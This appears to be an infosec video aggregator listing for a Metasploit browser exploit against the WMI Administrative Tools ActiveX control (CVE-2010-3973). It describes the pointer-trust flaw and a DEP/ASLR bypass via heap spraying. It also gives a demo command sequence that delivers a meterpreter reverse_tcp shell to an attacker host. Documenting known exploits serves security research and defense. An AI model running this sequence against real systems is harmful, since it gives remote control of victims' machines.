Timeline:
Vulnerability & PoC disclosed by WooYun on 2010-12-22
Metasploit PoC provided on 2010-12-22
PoC provided by:
WooYun
MC
jduck
Reference(s):
CVE-2010-3973 (WooYun)
CVE-2010-4588 (Carsten Eiram)
Affected versions:
Microsoft WMI Administrative Tools 1.1
Tested on Windows XP SP3
Description:
This module exploits a memory trust issue in the Microsoft WMI Administrative Tools ActiveX control. When processing a specially crafted HTML page, the WEBSingleView.ocx ActiveX control (1.50.1131.0) treats the 'lCtxHandle' parameter of the 'AddContextRef' and 'ReleaseContext' methods as a trusted pointer and makes an indirect call through it, which leads to arbitrary code execution. This exploit uses a combination of heap spraying and the .NET 2.0 'mscorie.dll' module to bypass DEP and ASLR: mscorie.dll does not opt in to ASLR, so the module should be reliable on all Windows versions. The WMI Administrative Tools are a standalone download and install (linked in the references).
Metasploit demo:
use exploit/windows/browser/wmi_admintools
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sessions -i 1
sysinfo
ipconfig
Owned !
Tags: wmi, windows, metasploit, 0day, microsoft
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.